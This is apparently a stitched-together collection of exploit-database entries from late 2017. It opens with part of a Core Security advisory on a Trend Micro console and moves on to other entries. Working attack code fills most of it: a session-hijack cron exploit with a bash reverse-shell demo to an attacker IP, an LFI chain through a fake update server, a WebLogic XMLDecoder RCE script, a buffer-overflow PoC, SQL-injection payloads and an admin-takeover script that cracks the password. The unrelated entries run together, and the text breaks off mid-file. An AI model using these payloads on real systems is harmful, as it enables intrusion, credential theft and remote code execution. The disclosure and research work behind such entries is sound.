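$command=$this->minute." ".$this->hour." ".$this->day." ".$this->month." ".$this->dayofweek." ".$this->command."\n";
if(!fwrite($this->handle, $command))
return true;
else
return false;
}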
// Installs the generated file with crontab(1). escapeshellarg() only protects the
// file *name* on the command line; the file *contents* written by saveCronFile()
// are installed unchanged, so the injected line ends up in the user's crontab.
function addToCrontab(){
if(!$this->filename)
exit('No name specified for cron file');
$data=array();
exec("crontab ".escapeshellarg($this->directory.$this->filename),$data,$ret);
if($ret==0)
return true;
else
return false;
}
```
The following Python script creates a cron job that runs an arbitrary command every minute. It also uses the session hijacking vulnerability described in 7.1, so no credentials are needed.
```
#!/usr/bin/env python
import requests
import sys
def exploit(host, port, command):
    """Grab a live session id from the leaked diagnostic log, then plant the cron job."""
    sid = get_session_id(host, port)
    print("[+] Obtained session id %s" % sid)
    execute_command(sid, host, port, command)
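def get_session_id(host, port):
    """Return the newest session id leaked in diagnostic.log, or None.

    Log entries are comma-separated: timestamp, milliseconds, level, session id,
    ... (see 7.1), so the id is the fourth field. The file is scanned from the
    end so the most recent session wins. The listing had lost its backslash and
    index in extraction (split('n'), footnote-mangled [3]); both are restored.
    """
    url = "https://%s:%d/widget/repository/log/diagnostic.log" % (host, port)
    r = requests.get(url, verify=False)  # console uses a self-signed cert
    for line in r.text.split('\n')[::-1]:
        if "INFO" in line or "ERROR" in line:
            fields = line.split(',')
            if len(fields) > 3 and fields[3]:
                return fields[3]
    return None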
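def execute_command(session_id, host, port, command):
    """Schedule `command` through the update-schedule form using a hijacked session.

    The form is posted to admin_update_program.php with hidTimingMin set to
    "* * * * * <command> #": the value is written verbatim into the crontab line,
    so the fields that follow it are commented out and the result is a job that
    runs `command` every minute as the web server user. The session id is sent
    both as the `sid` parameter and as a cookie named after itself, mirroring
    the console's own requests. Python 2 print statements were converted to
    print() calls so the script runs on either major version.
    """
    print("[+] Executing command '%s' on %s:%d" % (command, host, port))
    url = "https://%s:%d/php/admin_update_program.php?sid=%s" % (host, port, session_id)
    form_data = {
        "ComponentSchedule": "on",
        "ComponentScheduleOS": "on",
        "ComponentScheduleService": "on",
        "ComponentScheduleWidget": "on",
        "useAUSchedule": "on",
        "auschedule_setting": "1",
        "update_method": "1",
        "update_method3": "on",
        "userfile": "",
        "sid": session_id,
        "hidComponentScheduleOS": "1",
        "hidComponentScheduleService": "1",
        "hidComponentScheduleWidget": "1",
        "hidUseAUSchedule": "1",
        "hidScheduleType": "1",
        "hidTimingDay": "2",
        "hidTimingHour": "2",
        "hidTimingMin": "* * * * * %s #" % command,
        "hidUpdateOption": "1",
        "hidUpdateNowFlag": ""
    }
    r = requests.post(url, data=form_data, cookies={session_id: session_id}, verify=False)  # self-signed cert
    if "MSG_UPDATE_UPDATE_SCHEDULE" in r.text:
        print("[+] Cron job added, enjoy!")
    else:
        print("[-] Session has probably timed out, try again later!")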
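if __name__ == "__main__":
    # Arguments: host, port, command. The argv indices were mangled into footnote
    # links in the extracted listing; they are [1], [2], [3] (cf. the example run).
    if len(sys.argv) != 4:
        sys.exit("usage: %s <host> <port> <command>" % sys.argv[0])
    exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3])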
```
The following proof of concept opens a reverse shell to the attacker's machine.
```
$ python coso.py 192.168.45.186 4343 'bash -i >& /dev/tcp/192.168.45.80/8888 0>&1'
[+] Obtained session id q514un6ru6stcpf3k0n4putbd3
[+] Executing command 'bash -i >& /dev/tcp/192.168.45.80/8888 0>&1' on 192.168.45.186:4343
[+] Cron job added, enjoy!
$ nc -lvp 8888
Listening on [0.0.0.0] (family 0, port 8888)
Connection from [192.168.45.186] port 8888 [tcp/*] accepted (family 2, sport 59508)
bash: no job control in this shell
[webserv@ localhost ~]$
```
### 7.3 Remote command execution via local file inclusion
[[CVE-2017-14095](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14095)] The /widget/inc/widget_package_manager.php script passes user provided input to the PHP require_once function without sanitization. However, there are some restrictions that need to be overcome in order to include arbitrary files, as the application appends PoolManager.php at the end of the filename.
File /var/www/AdminUI/widget/inc/widget_package_manager.php:
```
switch($widgetRequest['act']){
case "check":
try{
// $strUpdateType = widget, configure_widget_and_widget_component
$strUpdateType = isset($widgetRequest['update_type']) ? $widgetRequest['update_type'] : 'widget';
$strFuncName = 'is'.WF::getTypeFactory()->getString()->getUpperCamelCase($strUpdateType).'Update';
$isUpdate = WF::getWidgetPoolFactory()->getWidgetPoolManager($strUpdateType)->$strFuncName();
[...]
```
File /var/www/AdminUI/widget/inc/class/widgetPool/WidgetPoolFactory.abstract.php:
```
// Lazily loads and instantiates the pool manager for $strUpdateType, which comes
// straight from the request ('update_type' in widget_package_manager.php).
public function getWidgetPoolManager($strUpdateType = 'widget'){
if(! isset(self::$instance[__FUNCTION__][$strUpdateType])){
// Only a camel-case transform is applied - no path validation - and "../"
// sequences survive it (see the request in 7.3).
$strFileName = $this->objFramework->getTypeFactory()->getString()->getUpperCamelCase($strUpdateType);
// Attacker-controlled path with a fixed 'PoolManager.php' suffix: any readable
// file whose name ends in PoolManager.php is included and executed.
require_once (self::getDirnameFile() . '/widget/'.$strFileName.'PoolManager.php');
$strClassName = 'WF'.$strFileName.'PoolManager';
self::$instance[__FUNCTION__][$strUpdateType] = new $strClassName($this->objFramework);
}
return self::$instance[__FUNCTION__][$strUpdateType];
}
```
One way for an attacker to place an arbitrary file on the system is to abuse the update process that can be managed from the same product console.
Files downloaded from alternate update sources are stored in the /var/tmcss/activeupdate directory. An attacker can setup a fake update server and trigger an update from it to download the malicious archive.
As an example, we have packed a reverse shell named rshellPoolManager.php into the bf1747402402.zip archive. The following server.ini would instruct the application to download the archive and uncompress it inside /var/tmcss/activeupdate:
```
; =======================================
; ActiveUpdate 1.2 US
;
; Filename: Server.ini
;
; New Format AU 1.8
;
; Last modified by AUJP1 10/14/2015
; =======================================
[Common]
Version=1.2
CertExpireDate=Jul 28 08:52:40 2019 GMT
[Server]
AvailableServer=1
Server.1=http://<serverIP>:1080/
AltServer=http://<serverIP>:1080/
Https=http://<serverIP>:1080/
[PATTERN]
P.48040039=pattern/bf1747402402.zip,1747402402,257
```
After triggering an update from the Web console, the PHP script is written to the expected location.
```
[root@ localhost activeupdate]# ls -lha /var/tmcss/activeupdate/ | grep php
-rw-r--r--. 1 webserv webserv 66 ago 25 22:59 rshellPoolManager.php
```
The final step is to include the script and execute our payload.
```
POST /widget/inc/widget_package_manager.php?sid=dj0efdmskngvt4lbhakgc6cru7 HTTP/1.1
Host: 192.168.45.186:4343
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Request: JSON
X-CSRFToken: dj0efdmskngvt4lbhakgc6cru7
Content-Type: application/json; charset=utf-8
Content-Length: 122
Cookie: dj0efdmskngvt4lbhakgc6cru7=dj0efdmskngvt4lbhakgc6cru7
Connection: close
{"act": "check", "update_type": "../../../../../../../../../var/tmcss/activeupdate/rshell"}
```
Steven Seeley and Roberto Suggi Liverani presented various privilege escalation vectors to move from webserv to root on their presentation "I Got 99 Trends and a # Is All Of Them". Based on our testing the attacks remain unpatched, so we did not try to find additional ways to escalate privileges.
### 7.4 Stored cross-site scripting
[[CVE-2017-14096](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14096)] The ru parameter of the wcs_bwlists_handler.php script is vulnerable to cross-site scripting. This endpoint is used to manage user defined URLs.
After the rule is inserted, the payload will be executed every time the user opens the user defined URLs section.
The following proof of concept stores code to open an alert box.
```
https://<serverIP>:4343/php/wcs_bwlists_handler.php?sid=2f03bf97fc4912ee&req=mgmt_insert&st=1&ac=0&ru=http%3A%2F%2F%3Cscript%3Ealert(1)%3C%2Fscript%3E&rt=3&ipt=0&ip4=&ip4m=128&cn=&dn=
```
### 7.5 Improper access control
[[CVE-2017-14097](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14097)] The product console includes widgets that can be used to monitor other servers. Credentials to access the servers being monitored, widget logs and other information reside on a SQLite database which can be accessed without authentication at the following URL:
```
https://<serverIP>:4343/widget/repository/db/sqlite/tmwf.db
```
The credentials are stored using AES256 with a dynamic key. However, the key is also placed inside the Web server directories and available for download without authentication.
```
https://<serverIP>:4343/widget/repository/inc/class/common/crypt/crypt.key
```
This would allow an attacker to decrypt the contents of the database, rendering the encryption mechanism useless.
## 8 Report Timeline
* **2017-09-04:** Core Security sent an initial notification to Trend Micro, including a draft advisory.
* **2017-10-02:** Core Security asked for an update on the vulnerabilities reported.
* **2017-10-02:** Trend Micro stated they were still in the process of creating the official fix for the vulnerabilities reported; the ETA for the fix was the end of that month (October).
* **2017-11-13:** Core Security requested a status on the timeline for fixing the reported vulnerabilities, since the original ETA had not been met.
* **2017-11-14:** Trend Micro stated they were still working on the Critical Patch and had found problems along the way; the patch was now in QA.
* **2017-11-20:** Trend Micro informed Core Security of the availability of fixes addressing 5 of the 6 vulnerabilities reported. They stated that one of the reported vulnerabilities is on a table where the SQL query is allowed and "does not cause anything leaking". They were still localizing the critical patches for other regions and would let Core Security know when everything was covered, in order to set a disclosure date.
* **2017-11-21:** Core Security thanked Trend Micro for the update and agreed to remove one of the reported vulnerabilities.
* **2017-12-05:** Trend Micro provided the CVE IDs for all the vulnerabilities reported and proposed December 14th as the public disclosure date.
* **2017-12-06:** Core Security thanked Trend Micro for the update and proposed Tuesday, December 19th @ 12pm EST as the public disclosure date.
* **2017-12-19:** Advisory CORE-2017-0008 published.
## 9 References
http://cwe.mitre.org/data/definitions/532.html
## 10 About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: .
## 11 About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [info@coresecurity.com](mailto:info%40coresecurity.com)
## 12 Disclaimer
The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License:
# Exploit Title: Buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712
# CVE: CVE-2017-17849
# Date: 22-12-2017
# Tested on Windows 10 32 bits
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Software Link: http://www.getgosoft.com/getgodm/
# Category: webapps
# Attack Type: Remote
# Impact: Code Execution
1. Description
A buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712 and earlier allows a malicious remote HTTP server to execute arbitrary code on the client machine running the download manager via an overly long response. To exploit it, the attacker's server returns a crafted HTTP response (the proof of concept below places a ~6000-byte payload in the status line). A successful attack results in code execution on the victim's computer.
2. Proof of Concept
def main():
    # PoC listener for CVE-2017-17849: the advisory says the overflow is
    # triggered by a crafted (over-long) HTTP response header, so this
    # script plays the server and answers the first client with a single
    # oversized status line. Defender view: the client must bound what it
    # copies from the response header; section 3 lists no vendor fix.
    host = "192.168.205.128"  # lab listener address, hard-coded
    port = 80
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, port))
    s.listen(1)
    print "\n[+] Listening on %d ..." % port
    cl, addr = s.accept()
    print "[+] Connection accepted from %s" % addr[0]
    # 4105 filler bytes, then the four bytes that apparently land in the
    # saved return address (the variable name says EIP), then padding up
    # to 6000 bytes in total.
    evilbuffer = "A" * 4105
    hardCodedEIP= "\x69\x9E\x45\x76" # Hard-coded EIP for the demo only (from the author's debugger session, see screenshot); it is environment-specific and must be changed.
    pads = "C"*(6000 - len(evilbuffer + hardCodedEIP))
    payload = evilbuffer + hardCodedEIP + pads
    buffer = "HTTP/1.1 200 " + payload + "\r\n"
    # Read (at most 1000 bytes of) the client's request, then send the
    # oversized status line as the whole response.
    print cl.recv(1000)
    cl.send(buffer)
    print "[+] Sending buffer: OK\n"
    sleep(3)  # presumably lets the client consume the response before the close
    cl.close()
    s.close()
if __name__ == '__main__':
    # Imports are done at the entry point rather than at the top of the
    # file; they still bind module-level names, which is what main() uses.
    import socket
    from time import sleep
    main()
3. Solution:
No solution as of yet.
import requests
import sys

# CVE-2017-10271: unauthenticated java.beans.XMLDecoder deserialization in
# the WebLogic wls-wsat web service; fixed by Oracle's October 2017
# Critical Patch Update. The endpoint below is the one the PoC posts to.
url_in = sys.argv[1]  # base URL; raises IndexError when no argument is given
payload_url = url_in + "/wls-wsat/CoordinatorPortType"
payload_header = {'content-type': 'text/xml'}
def payload_command (command_in):
    """Build the SOAP envelope for CVE-2017-10271 carrying `command_in`.

    The WorkContext header holds a java.beans.XMLDecoder document that the
    wls-wsat endpoint deserializes; the document constructs
    java.lang.ProcessBuilder with ["cmd", "/c", command_in] and calls
    start(), so the target is assumed to be a Windows host.
    Defender notes: alert on POST bodies to /wls-wsat/CoordinatorPortType
    that contain java.beans.XMLDecoder or java.lang.ProcessBuilder, and
    apply Oracle's October 2017 CPU. Returns the envelope as a str.
    """
    # NOTE(review): this table looks mangled by HTML extraction -- every
    # key maps to itself and the '"' entry does not parse as shown.
    html_escape_table = {
        "&": "&",
        '"': """,
        "'": "'",
        ">": ">",
        "<": "<",
    }
    command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
    payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
        " <soapenv:Header> " \
        " <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
        " <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
        " <void class=\"java.lang.ProcessBuilder\"> \n" \
        " <array class=\"java.lang.String\" length=\"3\">" \
        " <void index = \"0\"> " \
        " <string>cmd</string> " \
        " </void> " \
        " <void index = \"1\"> " \
        " <string>/c</string> " \
        " </void> " \
        " <void index = \"2\"> " \
        + command_filtered + \
        " </void> " \
        " </array>" \
        " <void method=\"start\"/>" \
        " </void>" \
        " </java>" \
        " </work:WorkContext>" \
        " </soapenv:Header>" \
        " <soapenv:Body/>" \
        "</soapenv:Envelope>"
    return payload_1
def do_post(command_in):
    """POST the envelope for `command_in` and print a one-line verdict.

    An HTTP 500 is taken as "executed": the banner below calls this a
    blind exploit, so no command output is expected in the response --
    presumably the handler fails after the XMLDecoder document has
    already run. Any other status is reported as failure. Returns None.
    """
    result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
    if result.status_code == 500:
        print "Command Executed \n"
    else:
        print "Something Went Wrong \n"
print "***************************************************** \n" \
    "**************** Coded By 1337g ****************** \n" \
    "* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \
    "***************************************************** \n"
# Interactive loop: each line typed is wrapped by payload_command() and
# posted via do_post() until the literal word "exit" is entered.
while 1:
    command_in = raw_input("Eneter your command here: ")
    if command_in == "exit" : exit(0)
    do_post(command_in)
# # # # #
# Exploit Title: Joomla! Component JEXTN FAQ Pro 4.0.0 - SQL Injection
# Dork: N/A
# Date: 24.12.2017
# Vendor Homepage: http://jextn.com/
# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/faq/jextn-faq-pro/
# Version: 4.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-17875
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_jefaqpro&view=category&id=[SQL]&Itemid=494
#
# 11+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1
#
# # # # #
Exploit Title: SilverStripe CMS - 3.6.2 CSV Excel Macro Injection
Vendor Homepage: https://www.silverstripe.org/
Software Link: https://www.silverstripe.org/download
Discovered by: Ishaq Mohammed
Contact: https://twitter.com/security_prince
Website: https://about.me/security-prince
Category: web apps
Platform: PHP
Description:
In the CSV export feature of the SilverStripe CMS, it's possible for the
output to contain macros and scripts, which if imported without
sanitization into software (including Microsoft Excel) may be executed.
Proof of Concept
Steps to Reproduce:
1. Login with normal user's credentials
2. Access the below URL via your browser:
http://localhost/SilverStripe/admin/myprofile
3. Enter the below payload in the "First Name" field and save the profile
@SUM(1+1)*cmd|' /C calc'!A0
4. Log in with admin's credentials on a different browser
5. Access the security page at the below link:
http://localhost/SilverStripe/admin/security/
6. Click on "Export to CSV" option and open the exported CSV file in any
Spreadsheet application
Solution:
The issue has been fixed in the latest release of SilverStripe which can be
downloaded from here: https://www.silverstripe.org/download
Reference:
https://www.silverstripe.org/download/security-releases/ss-2017-007
# Exploit Title: Sendroid - Bulk SMS Portal, Marketing Script( 5.0.0 - 6.5.0 ) - SQL Injection
# Google Dork: "welcome to * SMS portal"
# Date: 22/12/2017
# Exploit Author: Onwuka Gideon <dongiodmed[@]gmail[.]com>
Contact: http://twitter.com/@gideon_onwuka
# Vendor Homepage: http://ynetinteractive.com/
# Software Buy: https://codecanyon.net/item/sendroid-bulk-sms-portal-marketing-2way-messaging-script-with-mobile-app/14657225
# Version: 5.0.0 - 6.5.0
# Tested on: Mac OS
1. Description
The software suffers from SQL injection:
"/API/index.php?action=compose&username=sender&api_key=sdsd&sender"
2. Script (Automatic takeover)
Attached to mail
4. How to run Script
You must have PHP installed on your system to run the script.
- First, copy the code to a file and save(eg: sendroid_exploit.php)
- Open up your command line and CD into the directory where you saved the file.
- Now, type "$ php -f sendroid_exploit.php url=http://localhost/sms"
Note: The URL should be a direct link to where the software is installed.
3. Proof of Concept
Run the script for example:
php -f sendroid_exploit.php url=http://localhost/sms
<?php
/**
* A script to automatically get the admin password
*
* @author: Onwuka Gideon <dongidomed[@]gmail[.]com>
*
*/
// Fold key=value command-line arguments into $_GET (so url=... becomes
// $_GET['url']); the rest of the script reads its target from there.
parse_str(implode('&', array_slice($argv, 1)), $_GET);
// Sub-queries spliced into the <query> marker below: the admin e-mail and
// the password column in two SUBSTRING halves (1..32 and 33..), presumably
// because the error text used for extraction cannot carry the whole value.
$queries =[
"sql_get_email" => "/*!12345SELECT*/+email+FROM+users+WHERE+username='admin'",
"sql_get_password0" => "/*!12345SELECT*/+SUBSTRING(password,1,32)+FROM+users+WHERE+username='admin'",
"sql_get_password1" => "/*!12345SELECT*/+SUBSTRING(password,33)+FROM+users+WHERE+username='admin'",
];
// Error-based (duplicate group key) injection through the `username`
// parameter of /API/index.php: the selected value is concatenated with
// FLOOR(RAND(0)*2) and read back from MySQL's "Duplicate entry" error.
// Defender notes: detect requests to /API/index.php whose `username`
// carries SQL comments/keywords; fix by parameterising the query and by
// not returning database error text to clients.
$payload = "/API/index.php?action=compose&username=asdasd%27)%20OR%20(SELECT%203321%20FROM(SELECT%20COUNT(*),CONCAT+((<query>),FLOOR(RAND(0)*2))x%20FROM%20/*!INFORMATION_SCHEMA*/.PLUGINS%20GROUP%20BY%20x)a)--%20RPjw&api_key=sdsd&sender";
//
checkCommands();
print_r(getEmailAndPassword($_GET['url'], $payload, $queries));
/**
 * Aborts with the usage text unless a target URL was supplied.
 *
 * Reads $_GET['url'] (populated from argv by parse_str() above); when it
 * is missing or empty, prints help() and exits with status 1.
 * NOTE(review): the bare string literal in the branch is an expression
 * statement with no effect, so "Please enter a target" is never printed.
 *
 * @return void
 **/
function checkCommands(){
    //url && shell
    $url = $_GET['url'] ?? "";
    if( $url == "" ) {
        "Please enter a target";
        help();
        exit(1);
    }
}
// Print the usage text, one line per entry, each terminated by PHP_EOL.
function help(){
    $usage = [
        "Invalid command ",
        "eg php -f sendroid_exploit.php url=https://localhost/sms",
        "",
    ];
    foreach ($usage as $line) {
        echo $line . PHP_EOL;
    }
}
// ==
// == Reset password and Get the Password hash
// ==
/**
 * Runs the full takeover chain against $url and returns the recovered
 * admin credentials.
 *
 * Each step is a separate HTTP round trip through makeRequest():
 *  1. read the admin e-mail via the error-based injection;
 *  2. read the current password hash (two SUBSTRING halves, joined);
 *  3. POST that e-mail to /administrator/index.php?reset&p, which
 *     apparently resets the password on the strength of the e-mail alone;
 *  4. read the new hash the same way and hand it to crackPassword().
 * Step 2 is only echoed; it is not used afterwards.
 *
 * @param string $url      base URL of the installation, no trailing slash
 * @param string $payload  injection template containing the <query> marker
 * @param array  $queries  sub-queries keyed sql_get_email, sql_get_password0, sql_get_password1
 * @return array ["email" => string, "password" => int|string]
 *
 * Defender notes: steps 1, 2 and 4 need database error text to reach the
 * client and an unparameterised query; step 3 needs a reset flow that
 * acts on any submitted e-mail without a second factor or token.
 */
function getEmailAndPassword($url, $payload, $queries){
//>> Fetch admin email
echo "Fetching admin email....:";
$sql_get_email = $url . str_replace("<query>", $queries['sql_get_email'], $payload);
$email = extractValue(makeRequest($sql_get_email));
echo $email . PHP_EOL.PHP_EOL;
//<< EndFetch admin email
//>> Fetch admin old pass
echo "Fetching admin old password...:";
$sql_old_password0 = $url . str_replace("<query>", $queries['sql_get_password0'], $payload);
$sql_old_password1 = $url . str_replace("<query>", $queries['sql_get_password1'], $payload);
$old_password = extractValue(makeRequest($sql_old_password0), 'password') . extractValue(makeRequest($sql_old_password1), 'password');
echo $old_password . PHP_EOL.PHP_EOL;
//<< End Fetch admin old
// Now we have the old password and admin email
// reset password
echo "Resetting password...:";
$forgot_password = $url . "/administrator/index.php?reset&p";
makeRequest($forgot_password, "POST", ["userEmail" => $email]);
echo " Done!" . PHP_EOL.PHP_EOL;
//>> Fetch admin new password
echo "Getting new password...:";
$sql_new_password0 = $url . str_replace("<query>", $queries['sql_get_password0'], $payload);
$sql_new_password1 = $url . str_replace("<query>", $queries['sql_get_password1'], $payload);
$new_password = extractValue(makeRequest($sql_new_password0), 'password') . extractValue(makeRequest($sql_new_password1), 'password');
echo $new_password . PHP_EOL.PHP_EOL;
//<< End Fetch admin new password
//>> Cracking password
echo "Craking password...:";
$password = crackPassword($new_password);
echo $password . PHP_EOL.PHP_EOL;
//<< Cracking password
// return $sql_get_email;
return ["email" => $email, "password" => $password];
}
//
// == Single GET/POST round trip with cURL; returns the raw body, or
// == false when curl_exec() fails.
// ==
function makeRequest($url, $method = "GET", $parameter = []){
    $userAgent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36';
    // Options common to both verbs; POST adds the body on top.
    $options = [
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_URL => $url,
        CURLOPT_USERAGENT => $userAgent,
    ];
    if (strtolower($method) == "post") {
        $options[CURLOPT_POST] = 1;
        $options[CURLOPT_POSTFIELDS] = $parameter;
    }
    $handle = curl_init();
    curl_setopt_array($handle, $options);
    $body = curl_exec($handle);
    curl_close($handle);
    return $body;
}
// Pull the injected value out of a MySQL "Duplicate entry '...' for key
// 'group_key'" error text: strip the wrapper, runs of whitespace and quotes,
// then drop the last character (the FLOOR(RAND(0)*2) digit the payload
// appends). $what is accepted for the callers' sake but not used.
function extractValue($payload, $what = "email"){
    $strip = [
        "/ for key 'group_key'/",
        "/Duplicate entry /",
        "/\s\s+/",
        "/'/",
    ];
    $cleaned = $payload;
    foreach ($strip as $pattern) {
        $cleaned = preg_replace($pattern, "", $cleaned);
    }
    return substr($cleaned, 0, -1);
}
// Recover the reset password from its "md5hex:salt" form by enumerating
// integers: the loop tries md5($i . $salt) for $i = 1, 2, ..., so the
// reset password is evidently expected to be numeric. Returns the integer
// on a match, or the literal string "Could not crack password".
// Defender note: MD5 of a short numeric secret, even with a salt appended,
// is recoverable by enumeration; use a slow password hash (password_hash())
// and a long random reset token instead.
function crackPassword($password){
echo " cracking... please wait... ";
$pwsalt = explode( ":",$password );
for ($i=1; $i < 20000000000000 ; $i++) {
if(md5($i . $pwsalt[1]) == $pwsalt[0] ) {
return $i;
}
}
return "Could not crack password";
}
If you successfully run the script, you'll get the admin password. You can login to the admin portal:
localhost/sms/administrator/
4. Solution:
Update to the latest version
# # # # #
# Exploit Title: Biometric Shift Employee Management System 3.0 - Local File Download
# Dork: N/A
# Date: 24.12.2017
# Vendor Homepage: https://www.shiftsystems.net/
# Software Link: https://codecanyon.net/item/white-label-shift-employee-management-system/21061908
# Version: 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-17876
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to download local files.
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?user=download?name=VerAyari.Ver&path=[FILE]
#
# # # # #
# PS4 4.05 Kernel Exploit
---
## Summary
In this project you will find a full implementation of the "namedobj" kernel exploit for the PlayStation 4 on 4.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, *does not* contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port `9020` and will execute them on receipt.
You can find fail0verflow's original write-up on the bug [here](https://fail0verflow.com/blog/2017/ps4-namedobj-exploit/), you can find my technical write-up which dives more into implementation specifics ~~here~~ (this is still in progress and will be published within the next few days).
## Patches Included
The following patches are made by default in the kernel ROP chain:
1) Disable kernel write protection
2) Allow RWX (read-write-execute) memory mapping
3) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process
4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.
## Notes
- This exploit is actually incredibly stable at around 95% in my tests. WebKit very rarely crashes and the same is true with kernel.
- I've built in a patch so the kernel exploit will only run once on the system. You can still make additional patches via payloads.
- A custom syscall is added (#11) to execute any RWX memory in kernel mode, this can be used to execute payloads that want to do fun things like jailbreaking and patching the kernel.
- An SDK is not provided in this release, however a barebones one to get started with may be released at a later date.
- I've released a sample payload [here](http://www.mediafire.com/file/n4boybw0e06h892/debug_settings.bin) that will make the necessary patches to access the debug menu of the system via settings, jailbreaks, and escapes the sandbox.
## Contributors
I was not alone in this exploit's development, and would like to thank those who helped me along the way below.
- [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
- [Flatz](https://twitter.com/flat_z)
- [CTurt](https://twitter.com/CTurtE)
- Anonymous
E-DB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43397.zip
Xerox DC260 EFI Fiery Controller Webtools 2.0 Arbitrary File Disclosure
Vendor: Electronics for Imaging, Inc.
Product web page: http://www.efi.com
Affected version: EFI Fiery Controller SW2.0
Xerox DocuColor 260, 250, 242
Summary: Drive production profitability with Fiery servers and workflow
products. See which Fiery digital front end is right for your current
or future print engines and business needs. Manage all your printers
from a single screen using this intuitive print job management interface.
Desc: Input passed thru the 'file' GET parameter in 'forceSave.php'
script is not properly sanitized before being used to read files. This
can be exploited by an unauthenticated attacker to read arbitrary files
on the affected system.
======================================================================
/wt3/js/save.js:
----------------
103: function parseSaveMessages() {
104: var urlNode = saveDocument.getElementsByTagName('url').item(0);
105: var url = urlNode.firstChild.data;
106: var forcedSaveUrl = "forceSave.php?file=" + url;
107: window.open(forcedSaveUrl, 'save_iframe', 'width=1,height=1');
====
/wt3/forceSave.php:
-------------------
1. <?php
2. //code posted by chrisputnam at gmail dot com
// Streams $filename to the client in 1 MiB chunks (echo + flush per chunk).
// Returns false if the file cannot be opened; otherwise the byte count when
// $retbytes is true and fclose() succeeded, else fclose()'s status.
// Performs no check on the path it is given -- the caller is responsible.
3. function readfile_chunked($filename,$retbytes=true)
4. {
5. $chunksize = 1*(1024*1024); // how many bytes per chunk
6. $buffer = '';
7. $cnt =0;
8. // $handle = fopen($filename, 'rb');
9. $handle = fopen($filename, 'rb');
10. if ($handle === false)
11. {
12. return false;
13. }
14. while (!feof($handle))
15. {
16. //read a chunk
17. $buffer = fread($handle, $chunksize);
18. //send the chunk
19. echo $buffer;
20. //flush the chunk
21. flush();
22. //increment the size read/sent
23. if ($retbytes)
24. {
25. $cnt += strlen($buffer);
26. }
27. }
28. //close file
29. $status = fclose($handle);
30. if ($retbytes && $status)
31. {
32. return $cnt; // return num. bytes delivered like readfile() does.
33. }
34. return $status;
35. }
36.
// Taint source: the path is taken verbatim from the `file` query parameter.
// There is no allow-list, base-directory or realpath() containment check and
// (per the advisory) no authentication, so any file readable by the web
// server user is returned -- /etc/passwd and /etc/shadow are shown below.
// Fix: resolve the value against a fixed download directory and reject it
// unless realpath() stays inside that directory. The `!$filename` test only
// rejects an empty or "0" value.
37. $filename = $_GET['file'];
38. if(!$filename)
39. {
40. echo "ERROR: No filename specified. Please try again.";
41. }
42. else
43. {
44. // fix for IE caching or PHP bug issue
45. header("Pragma: public");
46. header("Expires: 0"); // set expiration time
47. header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
48. // browser must download file from server instead of cache
49.
50. // force download dialog
51. header("Content-Type: application/force-download");
52. header("Content-Type: application/octet-stream");
53. header("Content-Type: application/download");
54.
55. // use the Content-Disposition header to supply a recommended filename and
56. // force the browser to display the save dialog.
// basename() only shapes the suggested download name; it does not limit
// which file is read.
